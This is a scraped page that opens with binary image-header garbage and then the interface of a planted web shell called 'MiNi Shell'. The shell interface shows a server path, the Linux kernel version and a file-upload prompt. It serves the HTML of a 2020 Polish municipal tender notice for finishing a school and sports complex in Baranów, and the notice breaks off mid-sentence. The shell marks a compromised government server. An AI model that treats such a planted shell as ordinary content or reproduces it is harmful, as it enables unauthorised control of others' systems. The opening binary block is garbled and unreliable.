JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20200207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20200207/510003-N-2020.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 510003-N-2020 z dnia 2020-02-07 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Baranów</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">„Dokończenie budowy kompleksu oświatowo – sportowego wraz z zagospodarowaniem terenu przy ulicy Orlika w miejscowości Baranów”</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Baranów</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">25085552900000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Rynek</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">21</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">63-604</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Baranów</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">wielkopolskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">627 810 400, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">agnieszka.krawczyk-sodomska@baranow.pl, </span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">627 810 405</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.baranow.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">http://baranow.nowoczesnagmina.pl/</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">http://baranow.nowoczesnagmina.pl/</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Oferty skałada się pod rygorem nieważności w formie pisemnej. Oferty winny być złożone w siedzibie Zamawiającego, na adres: Gmina Baranów, ul. Rynek nr 21, 63-604 Baranów</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Gmina Branów ul. Rynek nr 21, 63-604 Baranów, SEKRETARIAT</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">„Dokończenie budowy kompleksu oświatowo – sportowego wraz z zagospodarowaniem terenu przy ulicy Orlika w miejscowości Baranów”</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">GP.ZP.271.1.2020</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1. Zaprojektowano budynek o dwóch kondygnacjach nadziemnych w części szkolnej i jednej kondygnacji na pozostałej części obiektu z poddaszem częściowo użytkowym gdzie mieszczą się pomieszczenia m.in. wentylatorowni, Budynek kryty dachem skośnym wielospadowym o kącie nachylenia połaci 6%-31%.Budynek kompleksu oświatowo – sportowego będzie spełniał wymagania izolacyjności cieplnej oraz inne wymagania związane z oszczędnością energii obowiązujące od dnia 1 stycznia 2021 roku (od 1 stycznia 2019 r. – w przypadku budynków zajmowanych przez władze publiczne oraz będących ich własnością) określone w jednolitym tekście rozporządzenia Ministra Infrastruktury w sprawie warunków technicznych jakim powinny odpowiadać budynki ich usytuowanie (t.j. Dz.U. z 2019 poz. 1065).2. Wyszczególnienie zaprojektowanych instalacji wewnętrznych i urządzeń.Projektowany kompleks oświatowo sportowy wyposażony będzie w następujące urządzenia techniczno – instalacyjne w tym m.in.:a) instalacje sanitarne: - instalację centralnego ogrzewania wraz z kotłownią o mocy do 350 kW, - instalację ciepłej wody użytkowej i cyrkulacji, - instalację gazową, - instalację kanalizacji sanitarnej i deszczowej, - instalację schładzania i wentylacji mechanicznej z rekuperacją (instalację klimatyzacji przewidziano w dwóch salach przedszkolnych od strony południowej) rysunek S70 branża sanitarna, - instalację wody zimnej i ppoż , - instalacja zasilania nagrzewnic w hali sportowej, b) instalacji zewnętrznych: wody (w tym oddzielnej do podlewania), p.poż wraz z naziemnym zbiornikiem o pojemności 50,00 m3, kanalizacji sanitarnej, gazu,c) instalacje elektryczne:- oświetlenie podstawowe,- oświetlenie ewakuacyjne,- oświetlenie zewnętrzne budynku ,- sieci komputerowej,- instalacje nagłośnienia,- odgromowa, - fotowoltaika o mocy zainstalowanej 40 kW,d) instalacje elektryczne niskoprądowe:- system alarmowy (sygnalizacja włamania i napadu),- instalacji kontroli dostępu,- system sygnalizacji pożaru,- system monitoringu, - instalacji wideofonowa / domofonowa,- instalacje audio – video wraz z instalacją nagłośnienia (szkolny radiowęzeł),- sieć komputerowa,Przeznaczenie i program użytkowy obiektu wraz z zestawieniem powierzchni:Pow. zabudowy: 4971,01 m2Kubatura budynku 30.000 m³Długość budynku 161,48mSzerokość budynku 60,55mWysokość budynku 11,37 mLiczba kondygnacji: 2 (część szkolna), 1 (pozostałe)Zestawienie powierzchni użytkowychPowierzchnia użytkowa budynku: 6 146,77 m²3. Opis szczegółowy przedmiotu zamówienia:1)	Przedmiotem zamówienia jest dokończenie budowy kompleksu oświatowo-sportowego składającego się z budynku szkoły podstawowej, dwuoddziałowego przedszkola, hali sportowej, pełnego zaplecza żywieniowego wraz z zagospodarowaniem terenu.2)	Przedmiot zamówienia obejmuje wykonanie wszelkich robót budowlanych niezbędnych do prawidłowego ukończenia zamówienia pn. „Dokończenie budowy kompleksu oświatowo – sportowego wraz z zagospodarowaniem terenu przy ulicy Orlika w miejscowości Baranów” opisanych w wielobranżowych projektach wykonawczych (w tym projektach wnętrz oraz rewizjach do projektów wykonawczych), Specyfikacjach Technicznych Wykonania i Odbioru Robót, zapisach i wytycznych zawartych w Specyfikacji Istotnych Warunków Zamówienia z załącznikami oraz ofertą Wykonawcy. 3)	Zamawiający informuje, że projekt budowlany zamienny oraz projekty wykonawcze do trzeciej zmiany pozwolenia na budowę dotyczą głównie zmiany zbiornika p.poż z podziemnego na naziemny wraz ze zmniejszeniem jego pojemności, doprojektowano ogrodzenie zbiornika z desek z thermodrewna z cedru kanadyjskiego, zmieniono lokalizację oraz materiał ścienny altany śmietnikowej na deski z thermodrewna, doprojektowano nawodnienie boiska trawiastego, określono zakres etapowania przedmiotu zamówienia w celu uzyskania dwóch decyzji pozwolenia na użytkowanie.4)	Zamawiający informuje, że dokończenie budowy kompleksu oświatowo – sportowego po przerwaniu robót (30.11.2018 roku) w wyniku odstąpienia Wykonawcy od umowy na podstawie art. 649[4] §. 2 KC zlecane jest w częściach tj. w ramach kilku odrębnych postępowań. Jedna z części dotyczy realizowanych od 27.01.2020 roku przekryć dachowych oraz przewidzianych w projekcie elewacji z blachy na rąbek stojący wraz z niezbędnymi robotami towarzyszącymi. Następnie po wyborze Wykonawcy i podpisaniu umowy na wykonanie przedmiotowego zamówienia, Zamawiający ogłosi ostatni przetarg, dotyczący dostawy i montażu podłogi sportowej oraz sprzętu sportowego w hali sportowej. 5)	Zakres wykonanych robót budowlanych na obiekcie po wykonaniu zleconego pokrycia dachu (przez innego Wykonawcę) można przyrównać do tzw. „stanu surowego otwartego”.6)	Do dnia odstąpienia Wykonawcy od umowy wykonano całość robót konstrukcyjnych wraz z więźbą dachową bez pokrycia dachu, wykonano ściany nośne, działowe, schody żelbetowe wewnętrzne (2 szt.), szyb windowy, stropy, podkłady betonowe podłogi z ułożoną podposadzkową instalacją kanalizacyjną, częściowo wykonano zewnętrzne i wewnętrzne instalacje sanitarne, częściowo rozprowadzono przewody elektryczne i teletechniczne. 7)	Wykonano następujące przyłącza: a)	przyłącze gazu o mocy przyłączeniowej 52,00 m3/h wraz z zamontowaną skrzynką gazową. b)	dwa przyłącza do sieci elektroenergetycznej: jedno o mocy przyłączeniowej 160 kW dla obiektu szkoły podstawowej i przedszkola natomiast drugie o mocy przyłączeniowej 40 kW dla obiektu hali sportowej;c)	przyłącze wody - zakończone niekompletną studnią wodomierzową (brakuje licznika i zasuwy)8)	Zakres robót wykonanych na obiekcie opisano w oddzielnych dla każdej branży Arkuszach inwentaryzacyjnych stanowiących załącznik Nr 11 do SIWZ.9)	Wygląd wewnętrzny obiektu ukazują wykonane fotografie wszystkich pomieszczeń (tj. ścian w każdym pomieszczeniu) aparatem z funkcją 4K, (co oznacza 4-krotnie większą rozdzielczość i 4-krotnie więcej szczegółów). Odpowiednio „spakowane” fotografie z nazwami pomieszczeń stanowią Złącznik Nr 12 do SIWZ.10)	Zakres robót do wykonania dotyczący zewnętrznych instalacji wodnej, kanalizacyjnej, deszczowej, gazowej, nawadniania i sanitarnej zaznaczono w kolorach na aktualnym planie sytuacyjnym stanowiącym Złącznik Nr 13 do SIWZ. Ponadto należy wykonać przewidziane w projekcie wykonawczym instalacyjnym do trzeciej zmiany pozwolenia na budowę, instalacje do automatycznego podlewania roślinności w atrium i boisku trawiastym.11)	Zakres robót do wykonania dotyczący robót elewacyjnych oraz fragmentu połaci dachowej z thermodrewna (cedr kanadyjski) zaznaczono w kolorze na fotografiach wykonanych z drona stanowiących Złącznik Nr 14 do SIWZ.12)	Zakres prac do wykonania w wykonanych pomieszczeniach magazynowych w obiekcie hali sportowej (od strony boiska ORLIK) zaznaczono na rysunku rewizyjnym REV_5_A6 (Rzut parteru hala – magazyny) oraz schemacie wyburzeń i zamurowań – magazyny Rys. W1. Zakres prac będzie polegał między innymi na: rozbiórce jednej ściany oddzielającej dwa magazyny, zamurowaniu jednych drzwi zewnętrznych oraz wykuciu i zamontowaniu we wskazanych miejscach magazynu dwóch drzwi wewnętrznych (drzwi ujęto w zestawieniu stolarki).13)	Zamawiający dopuszcza zmianę rodzaju przewidzianych tynków z gipsowych o zwiększonej wytrzymałości na uszkodzenia mechaniczne na tynki mineralne z gładzią gipsową. W razie wykonywania tynków mineralnych nie przewiduje się wykonania gładzi w pomieszczeniach technicznych i magazynowych. W pomieszczeniu sali sportowej O.C.35 w miejscach usytuowania okładzin akustycznych, odpornych na uderzenia (w klasie 1A) należy zastosować tynk akrylowy z wtopioną siatką zbrojącą.14)	Na dachu obiektu hali sportowej należy wykonać na potrzeby szkoły i przedszkola instalację fotowoltaiczną o wysokiej jakości technologii, o mocy 40 kW. MODUŁY FOTOWOLTAICZNE:Instalowane urządzenia muszą być fabrycznie nowe i posiadać gwarancję producenta powyżej 10 lat. Jako źródło energii odnawialnej w projektowanej instalacji fotowoltaicznej należy użyć monokrystaliczne moduły fotowoltaiczne o mocy min. 305 Wp każdy. Moduły zostaną połączone w sekcję podłączoną do falownika sieciowego. Pojedynczy moduł składa się z szeregowo połączonych ogniw monokrystalicznych. W skrzynce łączeniowej modułu znajdują się trzy diody bypass. Sprawność modułu min. 18,60%. Gwarancja liniowego spadku mocy – min. 25 lat (nie mniej niż 83,6%). Podwyższona odporność na działanie amoniaku oraz soli.INWERTER:Do uzyskania odpowiedniej charakterystyki wyjściowej do instalacji należy zainstalować falownik trójfazowy o odpowiedniej dobranej mocy. Energia prądu stałego generowana przez panele fotowoltaiczne jest zamieniana w przekształtniku bez transformatorowym na energię prądu zmiennego. Parametry wyjściowe będą zgodne z aktualnymi parametrami sieci wewnętrznej, do której wpięte będzie wyjście instalacji. Falownik musi posiadać moduł umożliwiający gromadzenie i lokalną prezentację danych o ilości energii elektrycznej wytworzonej w instalacji, a także posiadać moduł komunikacyjny RS485 do przesyłania danych. Urządzenia muszą być fabrycznie nowe i posiadać gwarancję producenta powyżej 5 lat od daty uruchomienia. Montaż instalacji powinien zostać poprzedzony wykonaniem ponownych obliczeń dla generatora w programie wspomagającym typu PVSol i przedstawieniu obliczeń do akceptacji projektanta/ inwestora. 4. Pozostałe wymagania odnośnie realizacji inwestycji oraz obowiązków Wykonawcy1)	Do obowiązku Wykonawcy należy wykonanie robót tzw. „naprawczych” (po poprzednim wykonawcy) dotyczących m.in.- złuszczonych powierzchni wykonanych podkładów betonowych na podłożu gruntowym, występujących w szczególności w pomieszczeniu hali sportowej i holu szkoły;- ewentualnego pogrubienia tynków w przypadku wystąpienia znacznych (ponadnormatywnych) nierówności i odchyłek (np. od pionu) powierzchni wymurowanych ścian. 2)	Do obowiązku Wykonawcy należy również wykonanie prac, których wielobranżowe projekty wykonawcze nie obejmują a są naturalną konsekwencją procesu budowlanego i w naturalny sposób z niego wynikają.3)	Zapewnienie pełnego bezpieczeństwa i właściwej organizacji robót budowlanych z wykorzystaniem urządzeń ochronnych i zabezpieczających w zakresie BHP, oraz zabezpieczenia przeciwpożarowego. 4)	Opracowanie i przedstawienie Zamawiającemu do zatwierdzenia Harmonogramu rzeczowo - finansowego, zgodnie z którym będzie realizowany przedmiot umowy. Harmonogram rzeczowo - finansowy (oddzielny dla szkoły z przedszkolem oraz hali sportowej) winien określać w porządku chronologicznym ramy czasowe wykonania poszczególnych części (Etapów) oraz rodzaje robót odpowiadające pozycjom scalonym wskazanym w kosztorysie ofertowym, wraz z szacunkiem przerobu i płatności, przy uwzględnieniu wykorzystania do ich realizacji określonych zasobów ludzkich i określonych zasobów materiałowych. 5)	Przedłożenie do zatwierdzenia Zamawiającemu przed rozpoczęciem robót Planu bezpieczeństwa i ochrony zdrowia (BIOZ).6)	Harmonijnej tzn. niezakłóconej i efektywnej współpracy z Wykonawcą pokryć dachowych szczególnie w okresie pokrywania się terminów realizacji obu przedmiotów zamówienia.7)	Przeprowadzenie wszelkich prób, badań i sprawdzeń każdej instalacji i sieci pod względem jej szczelności, bezpieczeństwa użytkowania i zgodności z Polskimi Normami, warunkami technicznymi wykonania i odbioru robót, łącznie z dokonaniem rozruchu wykonanych instalacji i urządzeń.8)	Skompletowanie oraz dostarczenie do UDT wymaganej dokumentacji celem dokonania stosownych odbiorów urządzeń.9)	Przygotowanie wymaganych dokumentów wraz ze zgłoszeniem zamiaru przyłączenia fotowoltaiki do operatora sieci dystrybucyjnej działającego na terenie gminy Baranów, uzyskanie pozytywnej weryfikacji zgłoszenia w postaci otrzymania potwierdzenia danych technicznych przyłączonej mikroinstalacji.10)	Sporządzenie świadectwa charakterystyki energetycznej (osobno dla hali sportowej i szkoły z przedszkolem).11)	Podczas wykonywania zamówienia stosować rozwiązania systemowe na które zostały wydane Krajowe Oceny Techniczne (Aprobata Techniczna). Między innymi 